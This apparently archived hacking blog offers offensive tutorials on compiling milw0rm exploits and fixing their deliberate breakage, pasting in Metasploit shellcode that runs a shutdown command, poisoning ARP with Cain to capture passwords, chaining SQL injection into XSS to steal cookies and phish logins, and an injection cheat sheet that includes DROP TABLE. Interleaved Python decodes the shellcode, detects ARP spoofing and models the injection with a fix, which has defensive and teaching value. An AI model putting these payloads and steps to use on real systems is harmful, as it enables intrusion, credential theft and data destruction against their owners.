Using exploits. (Includes n00b protection)

###############
# Yes, yes, noob, stfu if you think you are above this level. Everyone went through this stage, and some had to learn it the hard way by getting flamed on forums. This should spare them that flame :) #

I will discuss ways to handle and compile exploits. A lot of exploits come with "noob protection": the author moves or adds sections of text, or scrambles a simple statement, so that anyone who actually reads the code immediately sees that it should not be that way, while people who just download and run it get nothing. This keeps skiddies and noobs from grabbing and running the exploit. I will show you how to compile exploits with Dev-C++ and how to run Perl and PHP scripts. I will also include the entire remote library from milw0rm, compiled in full.

Downloads: Dev-C++, Perl (Windows installer), Perl (source), OpenSSL (Windows)

WSAStartup
If compiling an exploit gives you linker errors like these:

[Linker error] undefined reference to `WSAStartup@8'
[Linker error] undefined reference to `socket@12'

the exploit uses Winsock and the linker was never told to link the Winsock library that exports those functions.

Open the Dev-C++ compiler options (under the Tools menu).

In the main window there is a checkbox that says "Add the following commands when calling the compiler". Tick it and type this in the box:

-lwsock32

(That is the Winsock 1.1 library. If the exploit includes winsock2.h, use -lws2_32 instead.)

Press OK and compile again.
----

Using Shellcodes
You can generate shellcode for Metasploit payloads with ease. Here is one I made for this post:

/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x31\xc9\x83\xe9\xdc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
"\x94\x52\x85\x83\xeb\xfc\xe2\xf4\x10\x7c\x16\x85\xec\x94\xd9\xc0"
"\xd0\x1f\x2e\x80\x94\x95\xbd\x0e\xa3\x8c\xd9\xda\xcc\x95\xb9\xcc"
"\x67\xa0\xd9\x84\x02\xa5\x92\x1c\x40\x10\x92\xf1\xeb\x55\x98\x88"
"\xed\x56\xb9\x71\xd7\xc0\x76\x81\x99\x71\xd9\xda\xc8\x95\xb9\xe3"
"\x67\x98\x19\x0e\xb3\x88\x53\x6e\x67\x88\xd9\x84\x07\x1d\x0e\xa1"
"\xe8\x57\x63\x45\x88\x1f\x12\xb5\x69\x54\x2a\x89\x67\xd4\x5e\x0e"
"\x9c\x88\xff\x0e\x84\x9c\xb9\x8c\x67\x14\xe2\x85\xec\x94\xd9\xed"
"\xd0\xcb\x63\x73\x8c\xc2\xdb\x7d\x6f\x54\x29\xd5\x84\x64\xd8\x81"
"\xb3\xfc\xca\x7b\x66\x9a\x05\x7a\x0b\xe7\x3a\xf0\x98\xf0\x3d\xf2"
"\x82\xb4\x7f\xe3\xcc\xb9\x21\x85";

You can use that array in place of the shellcode in any exploit that carries one: paste it over the exploit's own
unsigned char array (keep the variable name the exploit expects) and check that the new Size fits the buffer the
exploit writes it into. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS (the web
interface of the Metasploit Framework of that era; today msfvenom generates the same thing). First, select the
payload you wish to use, then type the command you want it to execute and press "generate payload".

(Posted: Fri Dec 28, 2007 4:46 pm)

Your shellcode should be printed out nicely for you.
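Before pasting anybody's shellcode into an exploit it is worth checking what it actually does. The following is an added example written for this page (it is not from the post and not Metasploit code): it parses the C string above back into bytes, checks the count against the Size=168 in the generator's comment, and emulates the PexFnstenvSub decoder stub that the first 24 bytes are, instead of running it, to recover the plain payload and the command embedded at its end. The stub layout in the comments is what the bytes above contain; the key, the displacement and the loop count are read from the stub rather than assumed.

```python
import re
import struct

# The encoded payload exactly as the post prints it (\x escapes restored):
# Metasploit win32_exec, EXITFUNC=seh, CMD=shutdown -f -s, Encoder=PexFnstenvSub, Size=168.
SCODE_C_LITERAL = r"""
"\x31\xc9\x83\xe9\xdc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
"\x94\x52\x85\x83\xeb\xfc\xe2\xf4\x10\x7c\x16\x85\xec\x94\xd9\xc0"
"\xd0\x1f\x2e\x80\x94\x95\xbd\x0e\xa3\x8c\xd9\xda\xcc\x95\xb9\xcc"
"\x67\xa0\xd9\x84\x02\xa5\x92\x1c\x40\x10\x92\xf1\xeb\x55\x98\x88"
"\xed\x56\xb9\x71\xd7\xc0\x76\x81\x99\x71\xd9\xda\xc8\x95\xb9\xe3"
"\x67\x98\x19\x0e\xb3\x88\x53\x6e\x67\x88\xd9\x84\x07\x1d\x0e\xa1"
"\xe8\x57\x63\x45\x88\x1f\x12\xb5\x69\x54\x2a\x89\x67\xd4\x5e\x0e"
"\x9c\x88\xff\x0e\x84\x9c\xb9\x8c\x67\x14\xe2\x85\xec\x94\xd9\xed"
"\xd0\xcb\x63\x73\x8c\xc2\xdb\x7d\x6f\x54\x29\xd5\x84\x64\xd8\x81"
"\xb3\xfc\xca\x7b\x66\x9a\x05\x7a\x0b\xe7\x3a\xf0\x98\xf0\x3d\xf2"
"\x82\xb4\x7f\xe3\xcc\xb9\x21\x85";
"""


def parse_c_hex_string(literal: str) -> bytes:
    """Collect the \\xNN escapes of a C string literal into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))


SCODE = parse_c_hex_string(SCODE_C_LITERAL)


def decode_pex_fnstenv_sub(scode: bytes) -> bytes:
    """Emulate the PexFnstenvSub decoder stub instead of executing it.

    Stub (24 bytes, x86), as found at the start of the encoded blob:
      31 c9                  xor  ecx, ecx
      83 e9 <imm8>           sub  ecx, imm8        ; ecx = -imm8 = dwords to decode
      d9 ee                  fldz
      d9 74 24 f4            fnstenv [esp-0xc]     ; leaves EIP of the fldz at [esp]
      5b                     pop  ebx              ; ebx = address of the fldz (offset 5)
      81 73 <disp8> <key32>  xor  dword [ebx+disp8], key
      83 eb fc               sub  ebx, -4          ; next dword
      e2 f4                  loop xor              ; repeat ecx times
    Key, displacement and count are read from the bytes, so another blob from the
    same encoder (different key or length) decodes the same way.
    """
    expected = {0: b"\x31\xc9\x83\xe9",
                5: b"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73",
                19: b"\x83\xeb\xfc\xe2\xf4"}
    for off, sig in expected.items():
        if scode[off:off + len(sig)] != sig:
            raise ValueError(f"not a PexFnstenvSub stub (mismatch at offset {off})")
    imm8 = struct.unpack_from("<b", scode, 4)[0]
    count = (-imm8) & 0xFFFFFFFF            # xor ecx,ecx ; sub ecx,imm8
    disp8 = struct.unpack_from("<b", scode, 14)[0]
    key = struct.unpack_from("<I", scode, 15)[0]
    start = 5 + disp8                       # the fldz sits at offset 5
    if start + 4 * count != len(scode):
        raise ValueError("loop count does not cover exactly the rest of the blob")
    out = bytearray(scode[start:])
    for off in range(0, 4 * count, 4):
        (dword,) = struct.unpack_from("<I", out, off)
        struct.pack_into("<I", out, off, dword ^ key)
    return bytes(out)


def extract_command(decoded: bytes) -> str:
    """win32_exec keeps the CMD string as a NUL-terminated tail of the payload."""
    body = decoded.rstrip(b"\x00")
    start = len(body)
    while start > 0 and 0x20 <= body[start - 1] < 0x7F:   # walk back over printable ASCII
        start -= 1
    return body[start:].decode("ascii")


if __name__ == "__main__":
    print(f"encoded length: {len(SCODE)} bytes")
    plain = decode_pex_fnstenv_sub(SCODE)
    print(f"decoded payload: {len(plain)} bytes, starts {plain[:6].hex()}")
    print(f"embedded command: {extract_command(plain)!r}")
```

Run it and it reports 168 bytes, a decoded payload that starts fc e8 44 00 00 00 (cld; call) and the command shutdown -f -s, exactly what the generator comment claims. A blob whose bytes have been altered does not decode to a clean command string, which is the quick way to notice shellcode that has been tampered with.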
- - -

Perl Exploits
If you're using Windows, install the Perl MSI package linked at the top. Let's use an example Perl script from milw0rm: http://www.milw0rm.com/exploits/3661

Save that exploit to your C: drive as a file called "3661.pl". This exploit just generates an HTML file, "exploit.html", which carries the actual exploit; it's that simple. Some exploits require you to have SSL support installed, so grab OpenSSL for Windows from the downloads at the top of this post. Some exploits also require you to pass "arguments" on the command line, like the next one, 2552.pl.

Uh oh, noob protection?

syntax error at C:\2552.pl line 47, near "print"
Execution of C:\2552.pl aborted due to compilation errors.

Perl reports the line where parsing finally failed, which is usually one statement past the real mistake. Looking just above it, I instantly see that the line starting $vul=" has no ";" at the end of it. Put that in so it looks like this:

$host=$ARGV[0];
$path=$ARGV[1];
$vul="phpbb_security.php?phpbb_root_path=";

Now save it and try again. YAY:

C:\>2552.pl

########################################################################
#                                                                      #
#  phpBB Security <= 1.0.1 Remote File Include Vulnerability           #
#  Bug found By : Ashiyane Corporation                                 #
#  Email: nima salehi nima[at]ashiyane.ir                              #
#  Web Site : www.Ashiyane.ir                                          #
#                                                                      #
########################################################################

Usage: Ashiyane.pl [host] [path]

EX : Ashiyane.pl www.victim.com /path/

by r3dr0ot | 2008/02/26 15:02 | Penetration Test | Trackback

ARP Poisoning and Cain

Right then, it's time to get down to work! Today's post will focus on a useful little attack vector called ARP
poisoning (or ARP cache poisoning, for the sticklers).

What is ARP?

The Address Resolution Protocol (ARP for short) is how network devices map IP addresses to MAC addresses, so
that devices on the local network can find each other. ARP is basically a form of networking roll call.

ARP, a very simple protocol, consists of just four basic message types:

1. An ARP Request. Computer A asks the network, "Who has this IP address?"
2. An ARP Reply. Computer B tells Computer A, "I have that IP. My MAC address is [whatever it is]."
3. A Reverse ARP Request (RARP). The lookup in the other direction: a host that knows only its own MAC address
asks, "I have this MAC address; what is my IP address?"
4. A RARP Reply. A RARP server answers, "That MAC gets this IP address." (RARP is obsolete, replaced by BOOTP/DHCP,
and it plays no part in the attack below.)

All network devices have an ARP table, a short-term memory of all the IP addresses and MAC addresses the device has
already matched together. The ARP table ensures that the device doesn't have to repeat ARP Requests for devices it
has already communicated with.

Here's a basic example of a typical ARP process:


I want to print this article for a friend who's downstairs in the kitchen. In the kitchen there is a networked
printer with the IP 192.168.0.6. My computer has the IP 192.168.0.3.

So my computer broadcasts an ARP request to the entire network asking who has the IP 192.168.0.6. All the computers
that don't have this IP simply ignore the request, but the printer, which has that IP, wakes up and sends an
ARP reply saying "Hey! I'm 192.168.0.6 and my MAC address is [the printer's MAC]!"

Now that my computer knows the printer's MAC address, it sends the file to be printed to the correct printer and
associates the printer's MAC address with the printer's IP address in its ARP table.

The one problem with ARP is that it's very trusting: it assumes that whoever answers with an IP-to-MAC pairing is
the real owner of that IP. There's no verification, and most implementations will even update their ARP table from
a reply they never asked for. This was probably done to simplify networking at the start, but as you're about to
see, it leaves some very big security holes...


The Attack:

Since I'm using Windows XP (Windows haters, don't kill me; I use Linux on a regular basis), I'm going to
use a very clever program called Cain. You can download this program from www.oxid.it free of charge!

Some people use this tool and have no idea how it actually works and that's why I wrote this article, so you at
least know what it's doing!

So I'll fire up Cain (screenshot: http://img155.imageshack.us/img155/3742/cainsd8.jpg).

Right, so as you can (hopefully) see, I've fired up Cain, I've started the sniffer (the little network card
icon at the top left) and I've started ARP poisoning (the little radioactive symbol next to the sniffer).

Of course, before you can do that, you need to scan for hosts, so click on the little Hosts tab and you'll see
something like this (screenshot: http://img138.imageshack.us/img138/8838/hostsfs1.jpg).

So, as you can see, the hosts list is empty. How to solve this? Right-click and you'll see an option "Scan MAC
Addresses". Select that and you'll see a form (screenshot: http://img147.imageshack.us/my.php?image=scangn7.jpg).

Use the default of "Scan all hosts in my subnet" and you'll see a list of computer names, IP addresses
and MAC addresses come up. (Cain does this by sending an ARP request for every address in the subnet, so the scan
itself is visible to anyone watching the wire.)

From there, go back into the ARP tab, and at the top you should see a little plus sign; click on it to get something
like this (screenshot: http://img218.imageshack.us/img218/9823/arpgt2.jpg).

I've taken my hack lab's router IP on the left and then, on the right, all the IPs it talks to.

Be careful with this: if you take the router, every packet between those hosts and the router now passes through your
machine and has to be forwarded on (Cain does this for you, which is what the routing status below refers to). If
that forwarding stops, the computers can't communicate, and in a couple of clicks you've taken down their internet
access and their network access. It's pretty overt.

Anyway, back on topic.

Cain starts poisoning and you get something like this (screenshot: http://img144.imageshack.us/img144/403/poisonsm5.jpg);
for some reason it's overlapping, no big deal.

As you see, it says that it's full routing: both sides have been poisoned and Cain is relaying the traffic between
them. If you get half routing at first (only one side poisoned so far), that's normal.

Now, this is where it gets exciting!

Cain has yet another lovely feature: it picks up passwords from the traffic going through it. So I'm going to
go to an email site and type in some made-up credentials, and we'll see what Cain picks up.

So basically I created an account for this article and am going to log into that account from another computer
(screenshot: http://img72.imageshack.us/img72/2695/successpg8.jpg).

As you can see, two passwords have come up! Of course the accounts aren't real, but if they were I
would have full access.

This also works with FTP accounts, POP3 accounts and anything else that sends its credentials in the clear; just
take a look in the options!

It shows how dangerous a simple attack can be. It doesn't affect just the local network; it can expose all of your
internet details too.


The Defense:
Scared? Good. Now calm down!

This is scary stuff. ARP cache poisoning is trivial to exploit, yet it can result in very significant network compromise.
However, before you jump to DEFCON 1, notice the major mitigating factor: only local attackers can exploit ARP's
insecurities. A hacker would need either physical access to your network, or control of a machine on your local
network, in order to deliver an ARP cache poisoning attack. ARP's insecurities can't be exploited remotely.

That said, hackers have been known to gain local access to networks. Good network administrators should be aware of ARP
cache poisoning techniques.

Since ARP cache poisoning results from a lack of security in a protocol that is required for TCP/IP networking to
function, you can't fix it. But you can help prevent ARP attacks using the following techniques.

For Small Networks

If you manage a small network, you might try using static IP addresses and static ARP tables. Using CLI commands such
as "ipconfig /all" in Windows or "ifconfig" in 'NIX, you can learn the IP address and MAC
address of every device in your network. Then using the "arp -s" command (on Windows Vista and later,
"netsh interface ipv4 add neighbors"), you can add static ARP entries for all your known devices. "Static" means
unchanging: the entry is not overwritten by incoming ARP replies, which is what stops hackers from planting spoofed
entries for devices in your network. You can even create a login script that adds these static entries to your PCs
as they boot.

However, static ARP entries are hard to maintain; impossible in large networks. That's because every device you add
to your network has to be manually added to your ARP script or entered into each machine's ARP table. But if you
manage fewer than two dozen devices, this technique might work for you.

For Large Networks

If you manage a large network, research your network switch's "Port Security" features. One "Port
Security" feature lets you force your switch to allow only one MAC address for each physical port on the switch.
This feature prevents hackers from changing the MAC address of their machine or from trying to map more than one MAC
address to their machine. Note what it does not do: an attacker who keeps their own MAC and simply sends ARP replies
claiming someone else's IP is not stopped by port security at all, since every frame carries a legitimate source
MAC. The switch feature that actually validates ARP replies against known IP/MAC bindings is Dynamic ARP Inspection
(built on DHCP snooping); use it where your switches support it. Port security can still help prevent some ARP-based
man-in-the-middle setups.

For All Networks

Your best defense is understanding ARP Poisoning and monitoring for it. I'd highly recommend deploying an ARP
monitoring tool, such as ARPwatch, to alert you when unusual ARP communication occurs. This kind of vigilance is still
the greatest weapon against all kinds of attack -- for, as Robert Louis Stevenson wrote, "The cruelest lies are
often told in silence."

I'd like to thank http://www.watchguard.com/ for their defense section as I felt this was well written and it would
be redundant for me to write another section.

The introduction and the attack section was written by me.

- sas01

by r3dr0ot | 2008/02/20 18:00 | Trackback
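The monitoring the defense section recommends, shown as an added example for this page (it is not the post's material, and not arpwatch's or Cain's code): ARP reply frames are built and parsed at the byte level, and an arpwatch-style monitor keeps the IP-to-MAC table the post describes and alerts on exactly what Cain's attack produces on the wire: an IP whose MAC changes, and one MAC answering for both the router and a host. The addresses are placeholders constructed for the demo (the 192.168.0.x lab from the post, locally administered 02:... MACs), not a real capture.

```python
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet frame carrying an ARP reply: "I have sender_ip, my MAC is sender_mac".
    Cain sends exactly this, unasked, to both sides of the conversation it wants to sit in."""
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return ethernet + arp


def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return opcode, sender_mac, sender_ip


class ArpMonitor:
    """arpwatch-style bookkeeping. Two things earn an alert:
    - an IP that one MAC answered for is now answered for by another
      ("changed ethernet address", the first thing poisoning causes);
    - one MAC answering for more than one IP, which is what full routing looks
      like from the wire: the attacker's MAC claims the gateway towards the
      victim and the victim towards the gateway."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)

    def observe(self, frame: bytes) -> list:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return []
        _, mac, ip = parsed
        alerts = []
        previous = self.ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"changed ethernet address: {ip} was {previous}, now {mac}")
        self.ip_to_mac[ip] = mac
        known = self.mac_to_ips[mac]
        if ip not in known:
            known.add(ip)
            if len(known) > 1:
                alerts.append(f"{mac} now answers for {sorted(known)}")
        return alerts


def demo_capture() -> list:
    """Constructed frames, not a real capture: the lab from the post (router, my PC,
    the printer), then Cain poisoning both the router and my PC. MACs are placeholders."""
    router, me, printer = "192.168.0.1", "192.168.0.3", "192.168.0.6"
    router_mac, me_mac, printer_mac, cain_mac = ("02:00:00:00:00:01", "02:00:00:00:00:03",
                                                 "02:00:00:00:00:06", "02:00:00:00:00:99")
    return [
        build_arp_reply(printer_mac, printer, me_mac, me),   # printer answers my request
        build_arp_reply(router_mac, router, me_mac, me),     # router answers my request
        build_arp_reply(cain_mac, router, me_mac, me),       # Cain to me: "I am the router"
        build_arp_reply(cain_mac, me, router_mac, router),   # Cain to router: "I am 192.168.0.3"
    ]


def run_monitor(frames) -> list:
    monitor = ArpMonitor()
    alerts = []
    for frame in frames:
        alerts.extend(monitor.observe(frame))
    return alerts


if __name__ == "__main__":
    for line in run_monitor(demo_capture()):
        print(line)
```

On a real network you would feed observe() frames from a raw socket or a pcap instead of demo_capture(). The first alert is the "changed ethernet address" message arpwatch itself reports; the second is the full-routing signature. A router that legitimately holds several IPs will trip the second rule, so whitelist known multi-homed MACs rather than dropping the check.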

SiXSS attack tutorial

Author: HecTor

// There may be some grammar mistakes here, because English isn't my native language. Sorry, and tell me if you find a mistake ;)

[First]
This article is about the particularities of using two attacks, SQL injection and XSS (cross-site scripting), combined
into one attack: SiXSS.
Who is this article for? It is written for beginners in this area, but it expects the reader to have some
knowledge already; that is to say, at least a general notion of SQL injection and XSS.
And do not forget about the penal code and criminal responsibility for your own actions. The author of the article
takes no responsibility for any damage caused.

[How to]
And what is SiXSS? As I already wrote above, it is the joint use of the two types of attack. The question may arise: why
is this necessary? There is SQL injection, there is XSS, and there is no need to combine them!

But... Many people have faced this situation: a quick search for vulnerabilities on a web site brings no success.
No XSS is seen, there is a minimum of scripts... But! We have found a vulnerable request, the one that pulls the
requested page out of the database:

[vuln_url]
http://site.net/article.php?article=8
[/vuln_url]

Test for SQL injection. We try this (the "+" signs are URL-encoded spaces, and the trailing /* opens a comment that
swallows whatever the script appends after our value):

[vuln_url]
http://site.net/article.php?article=8+AND+1=2/*
[/vuln_url]

Nothing is shown.

[vuln_url]
http://site.net/article.php?article=8+AND+1=1/*
[/vuln_url]

The article is shown. The condition we appended was evaluated by the database, so this is SQL injection. Next, the
hacker tries to pull the data he needs out of the database. However, what do we do if there is no concrete information
about the database, or the database forbids access to files? Time goes by...
Right here, SiXSS comes in.

[SQL and XSS]
The SQL language has a UNION operator, which can combine the results of two queries. I'll try to explain:

[vuln_url]
http://site.net/news.php?id=1+union+select+1,DATABASE(),3/*
[/vuln_url]

The request selects the news item with identifier 1, and in the same request selects information about the database
(here, its name). In other words, UNION SELECT lets us put arbitrary text into the browser window: whatever we select
in the UNION is displayed wherever the page echoes that column. This is exactly what lets us use SiXSS. To begin with,
of course, it is necessary to find the number of columns, since the number of fields taken from the database must
equal the number of fields selected after UNION:

[vuln_url]
http://site.net/article.php?article=8+union+select+1,2,3/*
[/vuln_url]

This helps us if UNION is not filtered. Now we inject JavaScript through the SQL injection; it is displayed in the
browser thanks to this particularity of UNION SELECT. The string must be quoted and placed in the column the page
displays, so with three columns of which the third is echoed:

[vuln_url]
http://site.net/article.php?article=8+union+select+1,2,'<script>alert("Vulnerability");</script>'/*
[/vuln_url]

Here is an alert window with the message "Vulnerability". If we work with this script, we get a reflected XSS
vulnerability: send the victim such a link and their cookies are delivered to our sniffer. Which was to be proved:
now we can work with this vulnerability just like a usual XSS.

[Troubles]
Though, it is not all so simple; this was "the ideal variant" of "the ideal vulnerability". For example, what are we
going to do if the server has the directive "magic_quotes_gpc" on, which escapes the quotation marks in every request
value with a backslash? This is not a problem. To avoid this filtering, write the string without quotes: as a HEX
literal prefixed with 0x, or through the CHAR() function with the ASCII codes. You can use some program, or a special
script, or the facilities of MySQL itself (the functions char() and hex()).

So, suppose we hex-encoded the expression <script>alert("SiXSS");</script>. Let's substitute this value into the
vulnerable query (same three columns as above):

[vuln_url]
http://site.net/article.php?article=8+union+select+1,2,0x3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E/*
[/vuln_url]

So, we have bypassed magic_quotes. Now let us talk about the "bad look of the URL". It is the same as with usual
reflected XSS: the victim may refuse to follow a long and unclear URL, or the victim has JavaScript switched off.
Let's begin.

There are many different ways to make a victim follow the "poisonous" link without suspicion. I shall tell about
one of them.

If you have read some articles about XSS and used this vulnerability in practice, you must have an idea of how to
use reflected XSS in a POST request. I'll try to explain. For example, the data is sent to the vulnerable script by
the POST method. Example HTML form, which submits itself as soon as the page loads:

[html code]
<HTML>
<BODY ONLOAD="document.send.submit();">
<FORM NAME=send ACTION=xss.php METHOD=POST>
<INPUT TYPE=hidden NAME=alert VALUE="<script>alert('XSS');</script>">
</FORM>
</BODY>
</HTML>
[/html code]

And here is the script, with the name xss.php (it echoes the parameter without any escaping, which is the bug):

[php code]
<?php
echo $_POST['alert'];
?>
[/php code]

So, if we transmit the already familiar JavaScript, the alert appears, but the URL of the vulnerable script in the
address bar has no GET parameters. That is, it looks much less suspicious.

The poisonous link is palmed off like this: write a page that sends the request to the vulnerable script, and host it
anywhere. Then give the link to that page to the victim. The victim, suspecting nothing, follows the link; the data
is sent by POST to the vulnerable script, and the XSS fires!

In the same way, it is possible to host a script somewhere else and redirect the victim to the poisonous link with
our SiXSS. Example: such a script in PHP will redirect the browser to another page:

[php code]
<?php
header("Location: link");
?>
[/php code]

Fine, one more problem behind us. But let's return to the case where JS is switched off.

I have read about one interesting method. Using UNION SELECT we can bring onto the page not only JavaScript but also
HTML. So it is possible to fake a login and password form whose action points to our script, which writes all the
data to a file. It is simple phishing. Sounds good, yes?

[Hacked, yeah =)]
There is nothing "super new" in this article; it is all the same SQL injection and XSS. I hope you have taken
something from it. If you find any factual mistakes, tell me about them.

by r3dr0ot | 2008/02/19 08:31 | Penetration Test | Trackback(2)
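A runnable model of the whole chain above, added for this page (it is not the tutorial's code; SQLite stands in for MySQL, and the table, the article rows and the filter function are constructed): article.php splices the GET value into its query and echoes the row unescaped, the AND 1=1 / AND 1=2 test shows it is injectable, UNION SELECT 1,2,... is grown until the column count matches, the script is injected once as a quoted string and once through char() so the magic_quotes_gpc case (emulated as PHP's addslashes) can be compared, and a fixed version shows both halves of the remedy. Two deviations from the tutorial's URLs: the trailing /* is replaced by AND 1=2 so that only the injected row is displayed, and the quote-free payload uses char() rather than the 0x... literal, which MySQL accepts as a string but SQLite does not.

```python
import html
import sqlite3

# The tutorial's hex literal, decoded: this is the string the page ends up echoing.
PAYLOAD_HEX = "3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E"
PAYLOAD = bytes.fromhex(PAYLOAD_HEX).decode("ascii")   # <script>alert("SiXSS");</script>


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's article table (not the tutorial's target)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(8, "Eighth article", "Nothing to see here."),
                      (9, "Ninth article", "Still nothing.")])
    return conn


def addslashes(s: str) -> str:
    """What magic_quotes_gpc did to every request value: backslash-escape quotes."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def article_page(conn, article: str, magic_quotes: bool = False) -> str:
    """article.php as the tutorial describes it: the GET value is pasted into the
    query unquoted (it is 'supposed' to be a number) and the row is echoed into
    HTML with no escaping. Returns the HTML, or the database error text."""
    if magic_quotes:
        article = addslashes(article)
    sql = f"SELECT id, title, body FROM articles WHERE id={article}"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return f"<p>DB error: {exc}</p>"
    return "".join(f"<h1>{title}</h1><div>{body}</div>" for _, title, body in rows)


def is_injectable(conn) -> bool:
    """The AND 1=1 / AND 1=2 test: different pages mean the value reached the SQL parser."""
    return article_page(conn, "8 AND 1=1") != article_page(conn, "8 AND 1=2")


def find_column_count(conn, limit: int = 10) -> int:
    """Grow UNION SELECT 1,2,... until the database stops complaining: UNION only
    works when both sides select the same number of columns."""
    for n in range(1, limit + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if "DB error" not in article_page(conn, f"8 UNION SELECT {cols}"):
            return n
    raise RuntimeError("could not match the column count")


def char_expr(s: str) -> str:
    """A string with no quote characters at all: char(60,115,...) works in SQLite
    and MySQL; MySQL additionally accepts the 0x3C73... literal the tutorial uses."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def sixss(conn, magic_quotes: bool) -> dict:
    """Inject the script through UNION SELECT into the echoed (last) column, once as
    a quoted string and once quote-free, and report which version lands in the page."""
    n = find_column_count(conn)
    outcome = {}
    for name, expr in (("quoted", "'" + PAYLOAD + "'"), ("char", char_expr(PAYLOAD))):
        cols = [str(i) for i in range(1, n)] + [expr]      # 1,2,<payload>
        page = article_page(conn, f"8 AND 1=2 UNION SELECT {','.join(cols)}", magic_quotes)
        outcome[name] = PAYLOAD in page
    return outcome


def article_page_fixed(conn, article: str) -> str:
    """The fix has two halves: bind the id as a parameter (no SQL injection) and
    escape on output (no XSS even if the database contents are hostile)."""
    try:
        article_id = int(article)
    except ValueError:
        return "<p>bad article id</p>"
    rows = conn.execute("SELECT id, title, body FROM articles WHERE id=?",
                        (article_id,)).fetchall()
    return "".join(f"<h1>{html.escape(t)}</h1><div>{html.escape(b)}</div>" for _, t, b in rows)


if __name__ == "__main__":
    db = make_db()
    print("injectable:", is_injectable(db))
    print("columns:", find_column_count(db))
    print("magic_quotes off:", sixss(db, magic_quotes=False))
    print("magic_quotes on: ", sixss(db, magic_quotes=True))
```

PAYLOAD is the tutorial's own hex literal decoded, which is why the alert text is SiXSS. With magic_quotes on, the quoted version dies with a database error while the char() version still lands in the page, which is the point of the [Troubles] section; the fixed handler rejects the injected id outright and would escape the script even if it came from the table.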

Und3r h4ckin9 F0rum lol

http://72.20.10.53/affiliates.dmz

by r3dr0ot | 2008/02/18 23:34 | r3dr0ot's Profile | Trackback

SQL Quick Reference Revised

Symbols and Words:
' : closes the string literal the application opened, so everything after it is parsed as SQL rather than as data.
This is what starts most injections.

OR: tells the database to return rows that match what the query was supposed to check OR what you tell it.

AND: will only match rows where both conditions are true. You might wonder why you would
actually want your end of it to have to evaluate to true as well. But there is a reason,
which will be in the next article.

\' : needed to break out of the quotes when the application escapes your quotes by doubling them up: in MySQL the
backslash eats the first of the doubled quotes and the second one closes the string.

/* : comments out the rest of the query, a lot like --. I find it works well in combination with
the \' trick.

; : ends a statement, so another one can follow.


' having 1=1-- : if you're lucky it will give you an error containing a column name (the error messages described
here are Microsoft SQL Server's). It should be the first column the query selects. You get the error because a
statement with HAVING must GROUP BY its columns, HAVING some condition on a value of some sort; seeing as your
injected query is missing the GROUP BY, the server complains and names the column. If you get a column name, next
you would want ' group by ColumnYouGot having 1=1--. That should give you the next column. The next statement would
be ' group by column1,column2 having 1=1--. You can just keep extending that syntax until you don't get an error,
which means you have all the columns.

What can you do with all that? You could insert a row into the table using
' insert into tablename values(blah,blah,blah,blah);-- . You're going to need the right type of data for each of
those columns, most of which you can tell by the name. But most of the time there will be at least one you need to
check. To do this you would do ' union select sum(column) from tablename--. This gives you an error about
converting (or aggregating) that column's type into an integer, which tells you the type. So once you have all
that, insert the values you want. Yay.
----------------------------------------------------------------------------------------------------

' or 1=1-- : the most basic injection. It will work maybe one time in a hundred. It makes the WHERE clause true for
every row, so you get the first row that exists, whatever was being checked.
----------------------------------------------------------------------------------------------------


\' or 1=1/* : does the same thing but is used when the application doubles up quotes. The backslash
escapes you from the quotes; the /* comments out the rest of the query.
----------------------------------------------------------------------------------------------------

' ORDER BY 1-- : used to see how many columns the query you are injecting into returns. If you don't get
an error returned then keep increasing the number by one until you do get an
error. The number you used right before the one that gave the error is the number of columns.
EX: order by 9 gives no error. You then try order by 10, which gives you an error:
the number of columns is 9. Also use common sense: if you think it's a huge query,
don't start at 1 and increase by one (jumping in big steps and narrowing down gets there in a few requests).
-----------------------------------------------------------------------------------------------------

'; drop table tablename-- : used to delete an entire table. Never used it. Don't
be a dick.
-----------------------------------------------------------------------------------------------------
' union select 1,2,3 from tablename-- : with any luck, one of the numbers shows up in the page where the normal
output would be; swap a column name in for that number and you read its value from the table. Has worked a few times.
-------------------------------------------------------------------------------------------------------

' union select min(column) from tablename WHERE column > 'letter'-- :

